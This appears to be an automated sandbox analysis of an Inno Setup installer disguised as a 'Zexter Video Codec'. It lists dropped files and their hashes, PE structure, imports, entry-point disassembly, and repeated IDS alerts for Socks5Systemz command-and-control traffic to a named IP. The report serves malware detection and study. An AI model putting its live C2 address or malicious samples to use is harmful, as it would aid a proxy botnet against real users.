                                                                                                    Preview:#.# This file is part of RawTherapee..#.# Copyright (c) 2004-2011 Gabor Horvath <hgabor@rawtherapee.com>.#.# RawTherapee is free software: you can redistribute it and/or modify.# it under the terms of the GNU General Public License as published by.# the Free Software Foundation, either version 3 of the License, or.# (at your option) any later version..# .# RawTherapee is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the.# GNU General Public License for more details..#.# You should have received a copy of the GNU General Public License.# along with RawTherapee. If not, see <http://www.gnu.org/licenses/>..#..# Please keep this gtkrc in sync with the other ones from Clearlooks based themes...gtk-color-scheme = "rt_base_color:#ffffff\nrt_fg_color:#101010\nrt_tooltip_fg_color:#000000\nrt_selected_bg_color:#7C99AD\nrt_selected_fg_color:#ffffff\nrt_text_c
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3276
                                                                                                    Entropy (8bit):5.106247394055059
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:9yjeGR/K4ysHjBcKKFyY+fwVsFcDIYMkSnvRN55FQcsFnZFnFveKW+dFKeQFqer/:sjbR/njBz1QsFcUYnSR3QzwLwS
                                                                                                    MD5:72CACEE801EFA43AE137706B6A355D87
                                                                                                    SHA1:20AB5543B96FB36AE8540DF45022229E0A1EE780
                                                                                                    SHA-256:72EC12AEC248C88FA8D0EC7D3185F74006E45D092736B9EF8C15692C69A1355E
                                                                                                    SHA-512:FB2769296F2CF702E7387B6F959FE02EFC2AC96C9E782472C6CA93BD9E8C76FBE2BD725AF227E7444452735B96757C3ACFF51BE5D6A1FB6226E5FD7583D00FC6
                                                                                                    Malicious:false
                                                                                                    Preview:#.# This file is part of RawTherapee..#.# Copyright (c) 2004-2011 Gabor Horvath <hgabor@rawtherapee.com>.#.# RawTherapee is free software: you can redistribute it and/or modify.# it under the terms of the GNU General Public License as published by.# the Free Software Foundation, either version 3 of the License, or.# (at your option) any later version..# .# RawTherapee is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the.# GNU General Public License for more details..#.# You should have received a copy of the GNU General Public License.# along with RawTherapee. If not, see <http://www.gnu.org/licenses/>..#..# Please keep this gtkrc in sync with the other ones from Clearlooks based themes...gtk-color-scheme = "salt_pinch:#95B0DB\nbase_color:#dddddd\nfg_color:#0A0A0A\ntooltip_fg_color:#000000\nselected_bg_color:#95B0DB\nselected_fg_color:#FFFFFF\ntext
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3276
                                                                                                    Entropy (8bit):5.106247394055059
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:9yjeGR/K4ysHjBcKKFyY+fwVsFcDIYMkSnvRN55FQcsFnZFnFveKW+dFKeQFqer/:sjbR/njBz1QsFcUYnSR3QzwLwS
                                                                                                    MD5:72CACEE801EFA43AE137706B6A355D87
                                                                                                    SHA1:20AB5543B96FB36AE8540DF45022229E0A1EE780
                                                                                                    SHA-256:72EC12AEC248C88FA8D0EC7D3185F74006E45D092736B9EF8C15692C69A1355E
                                                                                                    SHA-512:FB2769296F2CF702E7387B6F959FE02EFC2AC96C9E782472C6CA93BD9E8C76FBE2BD725AF227E7444452735B96757C3ACFF51BE5D6A1FB6226E5FD7583D00FC6
                                                                                                    Malicious:false
                                                                                                    Preview:#.# This file is part of RawTherapee..#.# Copyright (c) 2004-2011 Gabor Horvath <hgabor@rawtherapee.com>.#.# RawTherapee is free software: you can redistribute it and/or modify.# it under the terms of the GNU General Public License as published by.# the Free Software Foundation, either version 3 of the License, or.# (at your option) any later version..# .# RawTherapee is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the.# GNU General Public License for more details..#.# You should have received a copy of the GNU General Public License.# along with RawTherapee. If not, see <http://www.gnu.org/licenses/>..#..# Please keep this gtkrc in sync with the other ones from Clearlooks based themes...gtk-color-scheme = "salt_pinch:#95B0DB\nbase_color:#dddddd\nfg_color:#0A0A0A\ntooltip_fg_color:#000000\nselected_bg_color:#95B0DB\nselected_fg_color:#FFFFFF\ntext
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24
                                                                                                    Entropy (8bit):4.136842188131013
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:1ERdiAqRv:1+MJ
                                                                                                    MD5:2BE834BAC02BFB69E1E7935A62A6B8FB
                                                                                                    SHA1:6165F776AC298A991E497B03E9C2E1797ED81029
                                                                                                    SHA-256:113DBDDEAEE29ED930AF404A0C0D5356A95D9D1B53BAE343F2782A29B5D4DBC9
                                                                                                    SHA-512:1F3BC0176EC15394E6CAD295A077F33C66BD9FEA4598715B5EDED4DDE397DE519FFC6D171E9DB53A09A50929FE6D8EDE5D4D51B5B786A0C3BE6481CB7A5BA4FC
                                                                                                    Malicious:false
                                                                                                    Preview:[General].Iconset=Light.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):720373
                                                                                                    Entropy (8bit):6.507155477779126
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:Vhu7eEcdCP8trP837szHUA6JCzS9Ntc3l3ER6orNjURFFDExyFZ:nu7eEYCP8trP837szHUA60SLtcV3E9k9
                                                                                                    MD5:74DE04C1DA3B854F12AE2E6C63AACF1D
                                                                                                    SHA1:18B6BEA4B7F04DF51BA3FCE01FDCB2A016714EB1
                                                                                                    SHA-256:CEB3C30CD6ED1CA29EE3A058D953BF2C7FE3B31452B4B8DD219D06D4138310E5
                                                                                                    SHA-512:F9E834F68ADCB2729ADF97AD96CBA376E9639D0348C326A0375B32623BBB5C08C782C5DFCC3505889179E6F9193AF0B8B6508F57D34CCD2F027C7E9A56FC077C
                                                                                                    Malicious:true
                                                                                                    Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................x..........x.............@..............................................@...............................%..................................................................................................................CODE.....w.......x.................. ..`DATA.................|..............@...BSS.....l................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................^..............@..P........................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:InnoSetup Log Zexter Video Codec, version 0x30, 10058 bytes, 571345\user, "C:\Users\user\AppData\Local\Zexter Video Codec"
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10058
                                                                                                    Entropy (8bit):5.007604284705348
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:dShWMdNpxUSZb9J+eOIhnn/VJKsFc8VyPEui4a:4hWMDpxUCSHIh/VJlFcWyPziV
                                                                                                    MD5:C881A2F9AC65D4CF870461DEB70EE31F
                                                                                                    SHA1:A9BB5E469627204C3A41631247A0F4B2176A86C0
                                                                                                    SHA-256:CCB0FF68881B65BF0B1A9FAF011E007EE3856BCD3673B2CFABCEBC366AF97EBA
                                                                                                    SHA-512:4BC33A5AFEBDE290810273AF289C78552431F2130CF490E6341B5EDBFE2D302510DD2D738B1AAE541FF0644611BAE150E1A4BA323198BBEF22D92BAD4DEF059E
                                                                                                    Malicious:false
                                                                                                    Preview:Inno Setup Uninstall Log (b)....................................Zexter Video Codec..............................................................................................................Zexter Video Codec..............................................................................................................0...N...J'..%....................................................................................................................................Q....571345.user0C:\Users\user\AppData\Local\Zexter Video Codec...........'...... ............IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User3
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):720373
                                                                                                    Entropy (8bit):6.507155477779126
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:Vhu7eEcdCP8trP837szHUA6JCzS9Ntc3l3ER6orNjURFFDExyFZ:nu7eEYCP8trP837szHUA60SLtcV3E9k9
                                                                                                    MD5:74DE04C1DA3B854F12AE2E6C63AACF1D
                                                                                                    SHA1:18B6BEA4B7F04DF51BA3FCE01FDCB2A016714EB1
                                                                                                    SHA-256:CEB3C30CD6ED1CA29EE3A058D953BF2C7FE3B31452B4B8DD219D06D4138310E5
                                                                                                    SHA-512:F9E834F68ADCB2729ADF97AD96CBA376E9639D0348C326A0375B32623BBB5C08C782C5DFCC3505889179E6F9193AF0B8B6508F57D34CCD2F027C7E9A56FC077C
                                                                                                    Malicious:true
                                                                                                    Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................x..........x.............@..............................................@...............................%..................................................................................................................CODE.....w.......x.................. ..`DATA.................|..............@...BSS.....l................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................^..............@..P........................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Category:modified
                                                                                                    Size (bytes):2586624
                                                                                                    Entropy (8bit):6.983193640665711
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:49152:v7mmNpaKaPVVldZRknn2/vg3FYPpWfidqm6tWz28g:v7mpKgNdZRknYg3Fo8OqmUWz28g
                                                                                                    MD5:4AC9B0BE70B6E01BFD47FFA47289DED7
                                                                                                    SHA1:A8E99F68A9DEA6F3C0A0767C4341716236D366E9
                                                                                                    SHA-256:A241C183E38754017F08936A0C6E71588EACAFC44C656110C071032F5B6FD159
                                                                                                    SHA-512:BA22F267944CB8FCB8729E99E62DB7EF27EAF38C2C613CD6C4106250EAABEC4546B387F465330410B006535B4DD9226FBDA12C22D6EC29795FC296C82E9C52A8
                                                                                                    Malicious:true
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L...`W.L..................".........(."......."...@...........................'......3(......................................."......p#..`............................................................................"..............................text.....".......".................`....rdata........".......".............@..@.data...8d....#..0....".............@....rsrc....b...p#..b....#.............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
File Type: PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category: dropped
Size (bytes): 98626
Entropy (8bit): 6.478068795827396
Encrypted: false
SSDEEP: 1536:HDuZqv5WNPuWOD+QZ7OWN4oOlatKZ2XGnToIfQIOEIOGxpdo4VoWsj:r9P6WN4wyTBfGqGxpdo4VoB
MD5: 70CA53E8B46464CCF956D157501D367A
SHA1: AE0356FAE59D9C2042270E157EA0D311A831C86A
SHA-256: 4A7AD2198BAACC14EA2FFD803F560F20AAD59C3688A1F8AF2C8375A0D6CC9CFE
SHA-512: CB1D52778FE95D7593D1FDBE8A1125CD19134973B65E45F1E7D21A6149A058BA2236F4BA90C1CE01B1B0AFAD4084468D1F399E98C1F0D6F234CBA023FCC7B4AE
Malicious: false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....='=.x..=......#.........t.....................c.......................................... .................................8...............................0...................................................0................................text...t...........................`.P`.data... ...........................@.0..rdata...M.......N..................@.`@/4......t&...P...(...4..............@.0@.bss..................................`..edata...............\..............@.0@.idata..8............f..............@.0..CRT....,............n..............@.0..tls.... ............p..............@.0..reloc..0............r..............@.0B................................................................................................................................................................................................................................
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.999573861042952
TrID:
• Win32 Executable (generic) a (10002005/4) 98.86%
• Inno Setup installer (109748/4) 1.08%
• Win16/32 Executable Delphi generic (2074/23) 0.02%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
File name: L9rm7AX4mp.exe
File size: 8'333'974 bytes
MD5: 0396163369529cd5b010e3c35a2066c5
SHA1: c3f58efd6dc957d0baf6eb71e0f6539e5eb3d596
SHA256: 31d2bac123d451caed79ced03b80592dacc3499f6c91a9e32630d3590d52a6c0
SHA512: 6805f80c0979432ff1e3adfed34fd8a30d8a79b839796dc94329b409892e4a5809df9728158dc782c78417badabbf20a058949814b37fc4f99a53c293d68e968
SSDEEP: 196608:dhd3YhVbbGfzH8dFXKH3ARHMjDB5braO5F5KMA7z0fCnIRBR:dnYTbuzH8dFaHfjVxronSCIPR
TLSH: D386338E75D09514F082CB3CA93C750D54A0339929BB63337A5E2A9D3EA3B93442EF57
                                                                                                    File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
Icon Hash: 2d2e3797b32b2b99
Entrypoint: 0x409c40
Entrypoint Section: CODE
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 1
OS Version Minor: 0
File Version Major: 1
File Version Minor: 0
Subsystem Version Major: 1
Subsystem Version Minor: 0
Import Hash: 884310b1928934402ea6fec1dbd3cf5e
Instruction
push ebp
mov ebp, esp
add esp, FFFFFFC4h
push ebx
push esi
push edi
xor eax, eax
mov dword ptr [ebp-10h], eax
mov dword ptr [ebp-24h], eax
call 00007F8B60F2589Bh
call 00007F8B60F26AA2h
call 00007F8B60F26D31h
call 00007F8B60F28D68h
call 00007F8B60F28DAFh
call 00007F8B60F2B6DEh
call 00007F8B60F2B845h
xor eax, eax
push ebp
push 0040A2FCh
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
xor edx, edx
push ebp
push 0040A2C5h
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
mov eax, dword ptr [0040C014h]
call 00007F8B60F2C2ABh
call 00007F8B60F2BEDEh
lea edx, dword ptr [ebp-10h]
xor eax, eax
call 00007F8B60F29398h
mov edx, dword ptr [ebp-10h]
mov eax, 0040CE24h
call 00007F8B60F25947h
push 00000002h
push 00000000h
push 00000001h
mov ecx, dword ptr [0040CE24h]
mov dl, 01h
mov eax, 0040738Ch
call 00007F8B60F29C27h
mov dword ptr [0040CE28h], eax
xor edx, edx
push ebp
push 0040A27Dh
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
call 00007F8B60F2C31Bh
mov dword ptr [0040CE30h], eax
mov eax, dword ptr [0040CE30h]
cmp dword ptr [eax+0Ch], 01h
jne 00007F8B60F2C45Ah
mov eax, dword ptr [0040CE30h]
mov edx, 00000028h
call 00007F8B60F2A028h
mov edx, dword ptr [00000030h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd000 | 0x950 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x11000 | 0x2c00 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xf000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
CODE | 0x1000 | 0x9364 | 0x9400 | 2c410dfc3efd04d9b69c35c70921424e | False | 0.6147856841216216 | data | 6.560885192755103 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA | 0xb000 | 0x24c | 0x400 | d5ea23d4ecf110fd2591314cbaa84278 | False | 0.310546875 | data | 2.7390956346874638 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS | 0xc000 | 0xe88 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xd000 | 0x950 | 0xa00 | bb5485bf968b970e5ea81292af2acdba | False | 0.414453125 | data | 4.430733069799036 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0xe000 | 0x8 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0xf000 | 0x18 | 0x200 | 9ba824905bf9c7922b6fc87a38b74366 | False | 0.052734375 | data | 0.2044881574398449 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc | 0x10000 | 0x8b4 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc | 0x11000 | 0x2c00 | 0x2c00 | 697c7e8eb3d0a669042c65dab0304fff | False | 0.3230646306818182 | data | 4.46301877582219 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x11354 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | Dutch | Netherlands | 0.5675675675675675
RT_ICON | 0x1147c | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | Dutch | Netherlands | 0.4486994219653179
RT_ICON | 0x119e4 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | Dutch | Netherlands | 0.4637096774193548
RT_ICON | 0x11ccc | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | Dutch | Netherlands | 0.3935018050541516
RT_STRING | 0x12574 | 0x2f2 | data | | | 0.35543766578249336
RT_STRING | 0x12868 | 0x30c | data | | | 0.3871794871794872
RT_STRING | 0x12b74 | 0x2ce | data | | | 0.42618384401114207
RT_STRING | 0x12e44 | 0x68 | data | | | 0.75
RT_STRING | 0x12eac | 0xb4 | data | | | 0.6277777777777778
RT_STRING | 0x12f60 | 0xae | data | | | 0.5344827586206896
RT_RCDATA | 0x13010 | 0x2c | data | | | 1.2045454545454546
RT_GROUP_ICON | 0x1303c | 0x3e | data | English | United States | 0.8387096774193549
RT_VERSION | 0x1307c | 0x4b8 | COM executable for DOS | English | United States | 0.2764900662251656
RT_MANIFEST | 0x13534 | 0x560 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.4251453488372093
DLL | Import
kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
user32.dll | MessageBoxA
oleaut32.dll | VariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
kernel32.dll | WriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
user32.dll | TranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
comctl32.dll | InitCommonControls
advapi32.dll | AdjustTokenPrivileges
Language of compilation system | Country where language is spoken | Map
Dutch | Netherlands |
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-03T08:39:57.996325+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49711 | 185.208.158.248 | 80 | TCP
2024-10-03T08:39:58.879562+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49712 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:01.788816+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49712 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:02.620011+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49715 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:03.096771+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49715 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:03.912593+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49717 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:04.832385+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49718 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:05.669677+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49719 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:06.018610+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49719 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:06.831497+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49720 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:08.481850+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49721 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:08.830452+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49721 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:09.645985+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49722 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:10.454749+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49723 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:11.275120+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49724 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:11.624286+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49724 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:11.967613+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49724 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:12.328222+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49724 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:13.668706+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49725 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:14.019252+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49725 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:14.838729+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49726 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:15.663948+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49727 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:16.468813+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49728 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:17.286665+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49729 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:18.088017+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49730 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:18.439019+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49730 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:19.251332+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49731 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:20.057528+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49732 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:20.409920+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49732 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:21.226324+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49733 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:22.025545+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49734 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:22.376751+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49734 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:23.198191+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49735 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:23.546290+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49735 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:23.890737+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49735 | 185.208.158.248 | 80 | TCP
